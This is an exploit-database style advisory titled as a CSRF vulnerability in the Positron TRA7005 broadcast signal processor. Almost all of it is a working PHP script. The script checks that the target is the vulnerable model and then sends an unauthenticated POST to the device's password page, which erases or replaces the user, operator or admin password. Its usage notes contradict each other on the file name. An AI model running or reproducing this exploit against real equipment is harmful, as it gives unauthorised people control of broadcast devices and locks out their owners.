=============================================================================================================================================
| # Title     : Positron Broadcast Signal Processor TRA7005 v1.20 5.1.6 CSRF Vulnerability                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits)                                                            |
| # Vendor    : https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/                                             |
=============================================================================================================================================

poc :

[+] Cross-site request forgery causes authentication bypass in Positron DSP (TRA7005) 
   
[+] save as poc.php

[+] Usage : C:\www\test>php 3.php poc.php

[+] payload : 

<?php

// التأكد من أن الوسائط صحيحة
if ($argc != 4) {
    echo "Usage: php positron.php <ip:port> <user/oper/admin> <erase/new_pwd>\n";
    exit(1);
}

$ip = $argv[1];
$ut = $argv[2];
$wa = $argv[3];

// التحقق من نوع المستخدم
$valid_ut = ['user', 'oper', 'admin'];
if (!in_array(strtolower($ut), $valid_ut)) {
    echo "Invalid user type! Use 'user', 'oper', or 'admin'.\n";
    exit(1);
}

$url = "http://$ip/_Passwd.html";
$did = "http://$ip/_Device.html";

// التحقق من الجهاز ومعرفة ما إذا كان الهدف ضعيفًا
$response = @file_get_contents($did);
if ($response === FALSE) {
    echo "Error checking device.\n";
    exit(1);
} elseif (strpos($response, 'TRA7K5') !== false) {
    echo "Vulnerable processor found!\n";
} else {
    echo "Not Vulnerable or not applicable. Exploit exiting.\n";
    exit(1);
}

// إعداد رؤوس الطلب
$options = [
    'http' => [
        'header'  => [
            'Content-Type: application/x-www-form-urlencoded',
            'Accept-Language: mk-MK,en;q=0.6',
            'Accept-Encoding: gzip, deflate',
            'User-Agent: R-Marina/11.9',
            'Accept: */*'
        ],
        'method'  => 'POST',
        'content' => '',
    ],
];

$payload = [];
// إذا كان الهدف مسح كلمة المرور
if (strtolower($wa) == 'erase') {
    $payload['PSW_' . ucfirst($ut)] = 'NONE';
} else {
    // إذا كان الهدف إعداد كلمة مرور جديدة
    $payload['PSW_' . ucfirst($ut)] = $wa;
}

$options['http']['content'] = http_build_query($payload);

// تنفيذ الطلب POST
$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);

if ($result === FALSE) {
    echo "Failed to send the request.\n";
} else {
    echo "Response:\n";
    echo $result;
}
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================